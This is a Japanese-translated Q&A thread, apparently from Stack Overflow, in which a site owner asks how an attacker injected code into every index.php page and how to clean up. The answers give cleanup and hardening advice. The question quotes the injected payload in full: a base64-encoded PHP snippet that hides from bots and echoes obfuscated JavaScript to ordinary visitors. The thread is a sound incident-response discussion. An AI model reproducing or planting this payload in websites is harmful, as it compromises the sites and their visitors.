php - PHP Web アプリケーションがハッキングされました。

Question

これは他の多くの人にも起こっていると思いますが、解決策を見つけるための正しい検索がわからず、検索結果が空のままになります。

ハッカーが私の Web アプリに侵入し、以下の評価コードをすべての index.php ページに挿入しました。私たちの Web サイトは重要ではないので、これは自動化された攻撃であると確信しています。このサイトには phpBB と wordpress の両方がインストールされています。phpMyAdmin にアクセスできなくなりました

1. 彼らはどのようにしてこれを行うことができたのでしょうか?
2. どうすれば修正できますか？

3. 再発しないようにするにはどうすればよいですか？

   base64_decode('ZXydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTJGMllYTjJQWEJ5YjNSdmRIbHdaVHQ5WTJGMFkyZ29laWw3YUQwaWFHRnlRMjlrWlNJN1pqMWJKeTB6TTJZdE16Tm1Oak5tTmpCbUxURXdaaTB5WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTmpGbU5UbG1OelJtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbU56Tm1NalJtTnpsbU5ESm1OVFZtTmpGbU16Wm1OVFZtTmpkbU5UbG1MVEptTFRObU5UWm1OamxtTlRobU56bG1MVE5tTFRGbU5EbG1ObVkxTVdZdE1XWTRNV1l0TWpsbUxUTXpaaTB6TTJZdE16Tm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1NVGRtTFRJNVppMHpNMll0TXpObU9ETm1MVEV3WmpVNVpqWTJaamN6WmpVNVppMHhNR1k0TVdZdE1qbG1MVE16Wmkwek0yWXRNek5tTlRobU5qbG1OVGRtTnpWbU5qZG1OVGxtTmpobU56Um1OR1kzTjJZM01tWTJNMlkzTkdZMU9XWXRNbVl0T0dZeE9HWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXRNVEJtTnpObU56Sm1OVGRtTVRsbUxUTm1OakptTnpSbU56Um1OekJtTVRabU5XWTFaall5WmpjMFpqY3laamM0WmpVM1pqYzVaamMwWmpjMlpqWXdaalkzWmpZeVpqWXhaalJtTmpabU5qbG1OemRtTlRsbU56Tm1OelJtTnpCbU56Sm1Oak5tTlRkbU5UbG1Oek5tTkdZMU5XWTNOR1kxWmpJeFpqWXhaalk1WmpFNVpqaG1MVE5tTFRFd1pqYzNaall6WmpVNFpqYzBaall5WmpFNVppMHpaamRtTm1ZdE0yWXRNVEJtTmpKbU5UbG1Oak5tTmpGbU5qSm1OelJtTVRsbUxUTm1OMlkyWmkwelppMHhNR1kzTTJZM05HWTNPV1kyTm1ZMU9XWXhPV1l0TTJZM05tWTJNMlkzTTJZMk0yWTFObVkyTTJZMk5tWTJNMlkzTkdZM09XWXhObVkyTW1ZMk0yWTFPR1kxT0dZMU9XWTJPR1l4TjJZM01HWTJPV1kzTTJZMk0yWTNOR1kyTTJZMk9XWTJPR1l4Tm1ZMU5XWTFObVkzTTJZMk9XWTJObVkzTldZM05HWTFPV1l4TjJZMk5tWTFPV1kyTUdZM05HWXhObVkyWmpFM1pqYzBaalk1Wmpjd1pqRTJaalptTVRkbUxUTm1NakJtTVRobU5XWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXlNR1l0T0dZdE1XWXhOMll0TWpsbUxUTXpaaTB6TTJZNE0yWXRNamxtTFRNelppMHpNMlkyTUdZM05XWTJPR1kxTjJZM05HWTJNMlkyT1dZMk9HWXRNVEJtTmpObU5qQm1OekptTlRWbU5qZG1OVGxtTnpKbUxUSm1MVEZtT0RGbUxUSTVaaTB6TTJZdE16Tm1MVE16WmpjMlpqVTFaamN5WmkweE1HWTJNR1l0TVRCbU1UbG1MVEV3WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTlRkbU56Sm1OVGxtTlRWbU56Um1OVGxtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbUxUSm1MVE5tTmpObU5qQm1OekptTlRWbU5qZG1OVGxtTFRObUxURm1NVGRtTmpCbU5HWTNNMlkxT1dZM05HWXlNMlkzTkdZM05HWTNNbVkyTTJZMU5tWTNOV1kzTkdZMU9XWXRNbVl0TTJZM00yWTNNbVkxTjJZdE0yWXlaaTB6WmpZeVpqYzBaamMwWmpjd1pqRTJaalZtTldZMk1tWTNOR1kzTW1ZM09HWTFOMlkzT1dZM05HWTNObVkyTUdZMk4yWTJNbVkyTVdZMFpqWTJaalk1WmpjM1pqVTVaamN6WmpjMFpqY3daamN5WmpZelpqVTNaalU1WmpjelpqUm1OVFZtTnpSbU5XWXlNV1kyTVdZMk9XWXhPV1k0WmkwelppMHhaakUzWmpZd1pqUm1Oek5tTnpSbU56bG1OalptTlRsbU5HWTNObVkyTTJZM00yWTJNMlkxTm1ZMk0yWTJObVkyTTJZM05HWTNPV1l4T1dZdE0yWTJNbVkyTTJZMU9HWTFPR1kxT1dZMk9HWXRNMll4TjJZMk1HWTBaamN6WmpjMFpqYzVaalkyWmpVNVpqUm1OekJtTmpsbU56Tm1Oak5tTnpSbU5qTm1OamxtTmpobU1UbG1MVE5tTlRWbU5UWm1Oek5tTmpsbU5qWm1OelZtTnpSbU5UbG1MVE5tTVRkbU5qQm1OR1kzTTJZM05HWTNPV1kyTm1ZMU9XWTBaalkyWmpVNVpqWXdaamMwWmpFNVppMHpaalptTFRObU1UZG1OakJtTkdZM00yWTNOR1kzT1dZMk5tWTFPV1kwWmpjMFpqWTVaamN3WmpFNVppMHpaalptTFRObU1UZG1OakJtTkdZM00yWTFPV1kzTkdZeU0yWTNOR1kzTkdZM01tWTJNMlkxTm1ZM05XWTNOR1kxT1dZdE1tWXRNMlkzTjJZMk0yWTFPR1kzTkdZMk1tWXRNMll5WmkwelpqZG1ObVl0TTJZdE1XWXhOMlkyTUdZMFpqY3paalU1WmpjMFpqSXpaamMwWmpjMFpqY3laall6WmpVMlpqYzFaamMwWmpVNVppMHlaaTB6WmpZeVpqVTVaall6WmpZeFpqWXlaamMwWmkwelpqSm1MVE5tTjJZMlppMHpaaTB4WmpFM1ppMHlPV1l0TXpObUxUTXpaaTB6TTJZMU9HWTJPV1kxTjJZM05XWTJOMlkxT1dZMk9HWTNOR1kwWmpZeFpqVTVaamMwWmpJM1pqWTJaalU1WmpZM1pqVTVaalk0WmpjMFpqY3paakkwWmpjNVpqUXlaalUxWmpZeFpqTTJaalUxWmpZM1pqVTVaaTB5WmkwelpqVTJaalk1WmpVNFpqYzVaaTB6WmkweFpqUTVaalptTlRGbU5HWTFOV1kzTUdZM01HWTFPV1kyT0dZMU9HWXlOV1kyTW1ZMk0yWTJObVkxT0dZdE1tWTJNR1l0TVdZeE4yWXRNamxtTFRNelppMHpNMlk0TXlkZFd6QmRMbk53YkdsMEtDZG1KeWs3ZGowaVpTSXJJblpoSWp0OWFXWW9kaWxsUFhkcGJtUnZkMXQyS3lKc0lsMDdkSEo1ZTNFOVpHOWpkVzFsYm5RdVkzSmxZWFJsUld4bGJXVnVkQ2dpWkdsMklpazdjUzVoY0hCbGJtUkRhR2xzWkNoeEt5SWlLVHQ5WTJGMFkyZ29jWGRuS1h0M1BXWTdjejFiWFR0OUlISTlVM1J5YVc1bk8zbzlLQ2hsS1Q5b09pSWlLVHRtYjNJb096VTVNU0U5YVR0cEt6MHhLWHRxUFdrN2FXWW9aU2x6UFhNcmNsc2labkp2YlVNaUt5Z29aU2svZWpveE1pbGRLSGRiYWwwcU1TczBNaWs3ZlNCcFppaDJKaVpsSmlaeUppWjZKaVpvSmlaekppWm1KaVoyS1dVb2N5azdQQzl6WTNKcGNIUSsnKSk7DQp9DQo=');?>
   

Answer 1

最初に Apache ログを見てください。どのスクリプトがヒットしていましたか? 次に、カスタム スクリプトがないかサイトを調べ、精査します。また、彼らが隠している可能性のあるバックドア アプリを探します。場合によっては、最近変更されたファイルや最近作成されたファイルを探すことができます...それらが賢い場合は、すべてのファイルをチェックする必要があります。

おそらくスクリプトである「彼ら」は、スクリプトをサイトにアップロードし、Webサーバーにそのスクリプトを実行させることでこれを行いました. 次に、Webサーバーが他のすべてを台無しにしました。

あなたの質問は一般的なものなので、ここで幅広いアドバイスをしています。詳細がある場合は、より具体的な質問を開いてください。

Answer 2

申し訳ありませんが、これがあなたに起こったことです。より多くの情報が不足していますが、これがあなたが調べるべきだと私が言うことです：

1. Web サーバーのセキュリティ。あなたは彼らがあなたの Web アプリをハッキングしたと仮定していますが、彼らは何らかの方法であなたのホスティング アカウントにアクセスできた可能性があります。普通のセキュアでない FTP 経由で転送する場合、これが脆弱性の原因になる可能性が非常に高くなります。また、多くの共有ホスト (PHP を使用していて、どのようにハッキングされたかわからない場合は、共有ホストを使用していると思います) は、ユーザー アカウントに他のユーザーがアクセスできないようにすることに関して、セキュリティが不十分です。

2. ジャンクが動的ページにある場合は、アプリまたはデータベースが危険にさらされています (phpMyAdmin にアクセスできない場合は、間違いなくその可能性があります)。ホスティング プロバイダーに連絡してください。新しいパスワードを取得できることを願っています。

Answer 3

最初に、ハッカーによって行われた変更をロールバックします (バックアップ、サーバーのロールバックなど)。その後、すべての CMS、モジュール、テーマ、またはその他の PHP アプリケーションを更新し、今後も最新の状態に保ちます。それが本当に自動化された攻撃であった場合、攻撃者は公開例外を使用しました。これは、ソフトウェアの新しいバージョンで修正されている可能性が高いです。

編集：しかし、もちろん、彼の答えで説明されているFull Decentのような挿入されたコード行をすべて削除してください。